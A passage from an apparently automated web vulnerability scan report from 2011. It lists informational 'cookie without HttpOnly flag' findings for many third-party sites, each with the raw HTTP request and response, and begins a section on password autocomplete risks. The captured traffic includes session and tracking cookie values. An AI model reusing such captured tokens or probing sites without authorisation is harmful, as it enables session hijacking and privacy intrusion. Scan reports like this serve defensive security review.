Set-Cookie: Conversion=CuUBQlR0bXZ0d1BBVGNMOEJJcXU2QWFnaWVrVXpvN29wQUtPNHRPSExzQ050d0hncWJnQkVBVVlCU0RNbmN3REtBbzRBRkRPb2ZqNS12X19fXzhCWU1udWc0andvLXdTb0FINjZxSGZBN0lCRm1admNtMXNaWE56Ym1WMGQyOXlhMmx1Wnk1amIyMjZBUUpxYzhnQkFkb0JIbWgwZEhBNkx5OW1iM0p0YkdWemMyNWxkSGR2Y210cGJtY3VZMjl0TDhnQ25zcXVHNmdEQWVnRFplZ0RPLWdEakFqb0E3Y0M5UU5BQUFERRITCMfAss7yy6gCFeVn5QodWm462BgAILvm6b7YyL_87AFIAQ; expires=Thu, 02-Jun-2011 13:31:53 GMT; path=/pagead/conversion/1005090170/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1005090170/?random=1304447520942&cv=6&fst=1304447520942&num=1&fmt=3&value=0&label=4QdQCNavnwIQ-uqh3wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=5&u_nmime=39&ref=http%3A//www.sedoparking.com/search/registrar.php%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking.com&url=http%3A//www2.itt-tech.edu/it/d/%3Fcode%3D12268064030%7Cnetworking%2520security&ctc_id=CMLVrJv1y6gCFRIq7AodFUGdtQ&ct_cookie_present=true&ctc_ai=BXKH3AAAAAACAgICwDwAAjuLThy4AADgB
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

16.166. http://www.googleadservices.com/pagead/conversion/1032234781/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1032234781/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1032234781/?random=1304447616843&cv=6&fst=1304447616843&num=1&fmt=2&value=0&label=F_NOCOHNgwIQnc6a7AM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=5&u_nmime=39&ref=http%3A//nerdbots.com/index.html&url=http%3A//nerdbots.com/services.html HTTP/1.1
Host: www.googleadservices.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nerdbots.com/services.html
Cookie: Conversion=CukBQlBHd0N0d1BBVGNMOEJJcXU2QWFnaWVrVWdZcTg2Z0hocTZtYkdjQ050d0dBcjVjQkVBTVlBeURNbmN3REtBbzRBRkNnN01yaF9mX19fXzhCWU1udWc0andvLXdTb0FHZHpwcnNBN0lCRm1admNtMXNaWE56Ym1WMGQyOXlhMmx1Wnk1amIyMjZBUUpxYzhnQkFkb0JIbWgwZEhBNkx5OW1iM0p0YkdWemMyNWxkSGR2Y210cGJtY3VZMjl0TDRBQ0FjZ0M4WnVHRjZnREFlZ0RaZWdETy1nRGpBam9BN2NDOVFOQUFBREUSEwi9kMrM8suoAhWBTOUKHahwT6kYASCau73a8ZeGiS9IAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Tue, 03 May 2011 13:45:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: Conversion=CukBQlBHd0N0d1BBVGNMOEJJcXU2QWFnaWVrVWdZcTg2Z0hocTZtYkdjQ050d0dBcjVjQkVBTVlBeURNbmN3REtBbzRBRkNnN01yaF9mX19fXzhCWU1udWc0andvLXdTb0FHZHpwcnNBN0lCRm1admNtMXNaWE56Ym1WMGQyOXlhMmx1Wnk1amIyMjZBUUpxYzhnQkFkb0JIbWgwZEhBNkx5OW1iM0p0YkdWemMyNWxkSGR2Y210cGJtY3VZMjl0TDRBQ0FjZ0M4WnVHRjZnREFlZ0RaZWdETy1nRGpBam9BN2NDOVFOQUFBREUSEwi9kMrM8suoAhWBTOUKHahwT6kYACD5qcGhrOinyzpIAQ; expires=Thu, 02-Jun-2011 13:31:49 GMT; path=/pagead/conversion/1032234781/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1032234781/?random=1304447616843&cv=6&fst=1304447616843&num=1&fmt=2&value=0&label=F_NOCOHNgwIQnc6a7AM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=5&u_nmime=39&ref=http%3A//nerdbots.com/index.html&url=http%3A//nerdbots.com/services.html&ctc_id=CN_8p8f1y6gCFRNe7AodIyoaog&ct_cookie_present=true&ctc_ai=BPI5RAAAAAACAgICwDwAA4aupmxkAADgB
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 379

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans
...[SNIP]...

16.167. http://www.multimap.com/clients/places.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multimap.com
Path:   /clients/places.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clients/places.cgi HTTP/1.1
Host: www.multimap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 169
Content-Type: text/html; charset=UTF-8
Location: http://classic.multimap.com/clients/places.cgi
X-BM-Srv: BL2M001203
Date: Tue, 03 May 2011 13:41:27 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1304430086; domain=.multimap.com; path=/
Set-Cookie: _SS=SID=C8CACE5402DC44858ED50F83A36DA5A0; domain=.multimap.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=C48621ED84A1449EA22D3F353A841A5D; expires=Thu, 02-May-2013 13:41:26 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110503; expires=Thu, 02-May-2013 13:41:26 GMT; domain=.multimap.com; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://classic.multimap.com/clients/places.cgi">here</a></body>

16.168. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /william-catherine-royal-wedding-dvd/detail.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products HTTP/1.1
Host: www.nbcuniversalstore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/
Cookie: SESSID=dd19ab195577124911a017a83007c863; DASHORTNAME=nbcuniversalstore; DAABTEST=B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Tue, 03 May 2011 13:32:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:59 GMT
Connection: close
Set-Cookie: DACART=deleted; expires=Mon, 03-May-2010 13:32:57 GMT; path=/; domain=nbcuniversalstore.com
Content-Length: 82600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
...[SNIP]...

16.169. https://www.newcb.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newcb.ktb.co.th
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.newcb.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:45 GMT
Content-length: 16312
Content-type: text/html
Last-modified: Wed, 23 Mar 2011 08:43:57 GMT
Etag: W/"3fb8-4d89b2cd"
Connection: close
Set-Cookie: BIGipServerwww.newcb.ktb.co.th_ext=2858156298.47873.0000; path=/

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link href="ncb.css" type="text/css" rel="stylesheet"/>
<title
...[SNIP]...

16.170. http://www.scriptlogic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.1.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=landing%3Egoogle%3Epackettrapit%3Ewireless; s_nr=1304447524201-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253Dlanding%25253Egoogle%25253Epackettrapit%25253Ewireless%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: EntryPointCheck=5/3/2011 9:43:23 AM; domain=scriptlogic.com; expires=Fri, 03-Jun-2011 13:43:23 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1"
...[SNIP]...

16.171. http://www.scriptlogic.com/int/am/prodsel/050709  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /int/am/prodsel/050709

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /int/am/prodsel/050709 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642072-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; EntryPointCheck=5/3/2011 9:32:06 AM

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:45:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /downloadmanager/default.aspx?focus=108
Set-Cookie: EntryPoint=/int/am/prodsel/050709; domain=scriptlogic.com; expires=Thu, 03-May-2012 13:45:16 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 156

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/downloadmanager/default.aspx?focus=108'>here</a>.</h2>
</body></html>

16.172. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /landing/google/packettrapit/wireless.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

16.173. http://www.yestheyrefake.net/vb/forumdisplay.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yestheyrefake.net
Path:   /vb/forumdisplay.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vb/forumdisplay.php HTTP/1.1
Host: www.yestheyrefake.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:34 GMT
Server: Apache
Cache-Control: private
Pragma: private
X-Powered-By: PHP/4.4.9
X-UA-Compatible: IE=7
Set-Cookie: bblastvisit=1304429734; expires=Wed, 02 May 2012 13:35:34 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 02 May 2012 13:35:34 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...

16.174. http://www.yestheyrefake.net/vb/showthread.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yestheyrefake.net
Path:   /vb/showthread.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vb/showthread.php HTTP/1.1
Host: www.yestheyrefake.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:33 GMT
Server: Apache
Cache-Control: private
Pragma: private
X-Powered-By: PHP/4.4.9
X-UA-Compatible: IE=7
Set-Cookie: bblastvisit=1304429733; expires=Wed, 02 May 2012 13:35:33 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 02 May 2012 13:35:33 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...

16.175. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:57 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=_hWN399XTxQ; path=/; domain=.youtube.com; expires=Thu, 29-Dec-2011 13:33:57 GMT
Set-Cookie: GEO=84476706a67ed9e0af16319f09944e3fcwsAAAAzVVOtwdbzTcAERQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: yNzcxRHpNN0ttUzA3LVpZYlMtWWVCZjF2c0R1cmt3T3pXUDlKMFQwWlNHSklzVzJWd3JtOEpB -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

16.176. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:58 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=Ki6p7Ug9WeY; path=/; domain=.youtube.com; expires=Thu, 29-Dec-2011 13:33:58 GMT
Set-Cookie: GEO=5ac4680f3b160291496141b25e4ac6fbcwsAAAAzVVOtwdbzTcAERg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html id="watch-html">
<head>
<script>
var yt = yt || {};yt.timing = yt.timing || {};yt.timing.tick = function(label, opt_time) {var timer = yt.timing['timer'] || {};if(opt_t
...[SNIP]...

16.177. http://www.zlmc.org/mindfulness-meditation.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zlmc.org
Path:   /mindfulness-meditation.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mindfulness-meditation.html?gclid=CLbmzNHyy6gCFUff4AodPQinqQ HTTP/1.1
Host: www.zlmc.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:01 GMT
Server: Apache/2.2.17
X-Powered-By: PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e7c4e00d12966c6a9d383111e612e1a5=930e9cbe73ffe1e034211a76fd8b0066; path=/
Last-Modified: Tue, 03 May 2011 13:43:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

16.178. http://www2.itt-tech.edu/it/d/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.itt-tech.edu
Path:   /it/d/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it/d/?code=12268064030|networking%20security HTTP/1.1
Host: www2.itt-tech.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:50 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Set-Cookie: ITD=12268064030%7Cnetworking%20security;domain=.itt-tech.edu;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Set-Cookie: FLOWSIM5=http%3A%2F%2Fwww%2Esedoparking%2Ecom%2Fsearch%2Fregistrar%2Ephp%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking%2Ecom;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 25005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Cont
...[SNIP]...

16.179. http://www22.glam.com/cTagsImg.act  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImg.act

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cTagsImg.act?gname=ct&gvalue=barhp&gtid=218930673&gdata=barhp_rt HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/Loans/P1242557963420
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utma=234602824.706286063.1303348792.1304359345.1304361407.4

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^2a7da43f1e5878f6f0f6b07ee1b0eeed^116391130334874196611^446224^446224^/^1x1^218930673^31230390^-1^-1^-1^-1^0^0^291013044182651762^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^barhp_rt
Set-Cookie: ctags=%3bct%3dbarhp; expires=Thu, 02 May 2013 10:24:25 GMT; path=/; domain=.glam.com;
ETag: "d50d5228dd2483ff2a750361030cb091:1274158213"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
X-Glam-Content: image/gif
Cache-Control: max-age=900
Date: Tue, 03 May 2011 10:24:25 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

16.180. http://xcdn.xgraph.net/15530/db/xg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xcdn.xgraph.net
Path:   /15530/db/xg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3 HTTP/1.1
Host: xcdn.xgraph.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache-Coyote/1.1
Content-Length: 43
Expires: Tue, 03 May 2011 13:58:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:58:22 GMT
Connection: close
Set-Cookie: _xgcid=F0929C0D59500951D2AAEB0F1F42D2D8; Domain=.xgraph.net; Expires=Fri, 02-May-2014 13:58:22 GMT; Path=/
Set-Cookie: _xguid=EEA5D446096D5054209EFA44A2E03874; Domain=.xgraph.net; Expires=Fri, 02-May-2014 13:58:22 GMT; Path=/
Set-Cookie: _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Fri, 02-May-2014 13:58:22 GMT; Path=/
Set-Cookie: _push4xgat=1304431102083; Domain=.xgraph.net; Expires=Wed, 04-May-2011 13:58:22 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

GIF89a.............!.......,...........D..;

17. Password field with autocomplete enabled  previous  next
There are 35 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

